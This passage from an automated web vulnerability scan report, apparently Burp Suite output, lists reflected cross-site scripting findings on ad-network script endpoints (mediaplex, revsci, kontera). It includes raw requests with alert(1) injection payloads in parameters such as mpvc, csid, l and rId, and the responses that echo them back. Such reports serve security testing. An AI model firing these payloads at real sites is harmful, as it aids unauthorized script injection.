GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f54bb8'%3balert(1)//3d79a42824 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:19 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6882
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?54bb8';alert(1)//3d79a42824http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592" target="_blank">
...[SNIP]...

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe36"%3balert(1)//f0cdb562aed was submitted in the mpvc parameter. This input was echoed as 3fe36";alert(1)//f0cdb562aed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f3fe36"%3balert(1)//f0cdb562aed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:17 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6886
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?3fe36";alert(1)//f0cdb562aed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||art
...[SNIP]...

4.110. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4693<script>alert(1)</script>358699d24a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J07717b4693<script>alert(1)</script>358699d24a2 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; rsiPus_vmwK="MLsXrrXu5hpv55C26tEiZ7bb6/4BtDlDtBB7zJPXn//lVupTzteSaDp+hCdybFqQKbgltSXX7TS7cgpzBrMBqaX8BzI1El6xTcZ2tmL8p8FopCvNGVgMiGp6m4WCGIDFz8s6bTEuRjHxHPwOUNL0PcgRhRWlj1o4UumrvZyMkn3aP/vekZ8k2DuPgo+z/A39akXZi/ljXBUEaLQDVotjGaU7XUCLvlphb90S1eXTX0lXvPUbPuB/HDDCWEVBlOHaeZVhRHMJiX5l3JmB+3axz/Ui88uMIrkgAXKVkg95FsGwcmCDb89v/jzJdFtPmz2lTWjSXA2GAEGF2s2Gzy2XMW6aXkVgfMYkWFgY2QaBYyFQYKtl+VIFFsZKmYO3w+FLw00k+llEUMAfRDbdHALC7vqvt2bQ8sMDY4yRFE/Az5AntJYRe23PUcJJlEcIc2YEr8Yi/HUoJU5U6n8KBuOA4mYPa3KLA6lu/n21W0CPnzRnQG2yRQ6Ej+tl7x90It9JLWCfCKptqpQWafYwCiT4TTN22AuKAcC7IOtgX7TrafAV5WsY/eNZ34vO9nfKqIKWwMCZWm0r6zvGiAVF0ZPc6C8r2kYL0MDkSz2QW0QBpDfnH3hQvUZlHM0IpaJ0CSR8HpGqYy7KqmHS/+NMGs55PsIQDo0ryYcXH5mW0TR5KRjaqO3abrfqnlU2LE0c2u30wuHAYNMWF0LeVEPUAp4GoPAYNu9+PepLNp8bQMXAqcDxYAc42Wqsc7UBi15FlPj1DhOKgrZikvlrfF6EiJHtYhSIrI5ptKddef7W1QSUXTiycBHBnbq+JZxfNtzdJJr8yriwxXiqmUOPxnKb9G/MXiLG+1WlXsUPH58ku4hJp65d5Sk3ZElQ4TKTA8R+mYlLozjbJHFZIVfOdThOuIb7EEmB8xzgu6OfQjFMhrUtmFajDQYlNsc5g4Ys33ak6g10RaThgjQOd3652pWs41+iQ6pyOZTWooJozs3yri0lPlPN0tpQ8j38th2sgYuOzCnAmbJUqnCCwPuHLfBM70OiKvcQBGxAXJnvnrw/0Z5VD3WoQRgstWTQe43xxXY4VkU//OiDlE040pQUkIIucnFzVa6dfCFMzQDg9ODeOkuPYnkR39oaHdcxilmAhaYLhkUeOccQPMFQxb9ty6KuhMrv5GvxcXLjAotxD3c4nqGR1hd+e+VbX6yxEG5R/HK+Xf3HmfJPUgXJ1BhBM4+byNW85rw="; rsi_us_1000000="pUMVIylDPxYY1A2wm50pnGGQ0zNpHybC/Epid4ekCKb0JoxyRDpE1XLlA0bzx2GBirrrtvFzmqtt2d8vyVmd1RHWYUkCyaVIm4arMZk3Ricz7TwST5R/SRE4auSU/cOsRSvgJ4kCtpLhZTSPij4653OLLrl6lZ7mE34xzvwEXpU1cHLKjnk5qgcOGlPGkPMQ/HaqKBYsAdwXVqee4J4iGmQJS3v57ByNA59iLDwM9qhwnI901ZX2tBrFVU79Ne9JTIhu6rvRsz+bXaFr3H1pznbziOb3i1UjPs+ep9xC9jjdCwsXKQqzVPYTPp76iBzukmgXo0EsAldCp+C6CONzhs5gC1UVd+t2+0OHz3rE9jCRxAUl3NyPfm2+xej4I0U8fJZpFLkpdKO4TRFUAc5SNTomthOfLQaUgjWrt3dowvlz54LFh+bj/OZ15BVdDDhKwXvy8y7fXsV6Uyc7Pt5Xqagafj2t4I+Xsr0K3yL+Q2sli8SfxqQ3CZOdou4ftQSO9oG1iUquSihov7nmtxdclJem7gBbgdgDtBBUTJM+RYtsDjLvSfQewZ3UjX6zisvY2GKDEdu9RTl0MxpzvERD3CvfjRQtpEcgbAJFuN5btC8Xn7odks/OBZv61oGRPfIeea5CFKm9rx+0Dy7tmUzy/RNf6kqCtyXxKf+qJWk3mcVJMTBNQ6OtIHGtaU/GyYyIJSB/IuxHyEmU7cdH+WFkgcEAjBHR5ALJKNuxpIgKNSsDe1L/E23x0BWnfo5PpaT1RRr+F2NsPswP+1EA81TcUzuU7oVW6YeYIyc1EJPAxlGzB49O1AsfYyNPIO+f/RzXBGhqlyWsCQ/zuZUOnNCBnX2Yaof/7/xiz3U4MAdJxDqq/ieZyTNh8d/+LzUIgjCyRjEvx0DGcxmtAyq6xL0Hq2CPmaJOlPcXrlUM1VPP8Rf43xcGMvBW6DMbNQIj0FDKA5/4BSvl1LblaIP4lSksLW9kClFy9doAE+pOm5+8Gnjv9DuolXIyCXBvRw3U7aqAzLJu41qvCkoGYosjRwWWymQQLKcyQdsHRPIa+Rz3Ej8e5VUYYGoFEkaV207qpc4moaV5bH07c88ON+zpor6jFm8nBx2ZuZPcuNjPxItOPfkXLyvEzUC2xzKqZZJEUiEFxkVaLbTmqPidLhAcyPppqdpTiLuWXFNDPrURsRd14Px6fibj/1Z9c1WX5qu8YkaatZsD8r3FbD2SIIBY20qTNQ/T30aWYwhX1YsjmbyIwHeYwnIvOm4ETn9EFZeU9J8g6qjJsImu6wr3rnKKsvOJsMxb8Fav6s8q4TP/2+aAt3vVgK6UTD8nG/6Xn2x97QSym/22URkM//YbVf6AE7spJpuvezT484jHjLoE09vEXOZ8je+GTcegSu1087rdhqbG9g4C4AJfcEIT2vNi/yomqtcxxbElbMnRbPsYmbgbYaz4hsSgfdeyNQ9waSpbmk2cHSArPM3RakNfwBfEbewBzPpnTbb7ooon0OG8nmLIyzlGsX82m9hyYYLvvCrgQoAvc/cFOoNDMGr+cavibJVd083DBkjLwT8YwOSjCaNTYl2z4XVawbbgaSSvpRuyntJVYZkJVbWQd9S4tBV6tMdJa8Lw/yYNLygb40zddtYRLWNfiVtOE0d6KF305ookVV8nkIbOVjEV4pZLcWPNfJ9UBYl2AEo="; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4z+huXIMJ/C1v6FY5BBd22rMpqLhiql/k32IlwMqsneLA7NlzsN5SuHyX2BRF5d65SaNq4yWbBkXQPF7ywJCkw+8fee+Ci1ww4TAIgmBv1Im4IlAyckkFDdZMtEpXiKykk7RoRoFR3oIbR9oO36G6jQquAAjRV25uQHpxKsSbL+Xbpak7/UAb4VY2+Doq58gE6rVzqShFUnu/GeSoBK3FzAQJ4tm6F6+kEV9xIBYDOlLycg+EHCW9SoOK0Da5RrJESR/YCuGWG0X4jEmEemu2r3fG81Kl+H2tkU/7Fupph24Qe2xvtnIX92P2kupq9TJAmvsFIdb6VChs3aYXPBBsKv9JceLT0rXL3r3JqW97t2CNejZJFPqnREALlJkZPimruVQj4CdDasyqHe4qRakKVsk/mA1tXedBz2im5lPQYJh8Iw2kAir007vHlWYJltd9+zB+IogciCvrgYiaiylWplquvfN/YhlZAVyekhcf0/4m3lfxetxVytKCNGRB1eKSptqXsDkBKyzcaJYzYt7E7aUD3ZKN1AAkIco2Hm5fl2ZfyqiP577826hhEMg3Od9PIFhqTbxzd/469rFly/bsvXdR/PZITutLSC2TfN4hB7XY8M6NPQgWWBNbZf/Yl/JQEuTHXfPyCZ0Bp176rqcZUbj0ScrxUyg88l6UeTGPFLBj6e4KLW0doQpigZdTkkduROK9j474Wdxfua0yYnzs8X0b04W7javQJ7WOaeFm6FL; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rtc_d44E=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 11:03:13 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 11:03:13 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:13 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J07717B4693<SCRIPT>ALERT(1)</SCRIPT>358699D24A2" was not recognized.
*/

4.111. http://kona40.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc76"%3balert(1)//9f187d63db2 was submitted in the l parameter. This input was echoed as dcc76";alert(1)//9f187d63db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76"%3balert(1)//9f187d63db2&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=0&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1532

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...
uestId="113351171490846325";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/dcc76";alert(1)//9f187d63db2&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");


4.112. http://kona40.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona40.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99c70"-alert(1)-"e6f81577124 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=099c70"-alert(1)-"e6f81577124&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
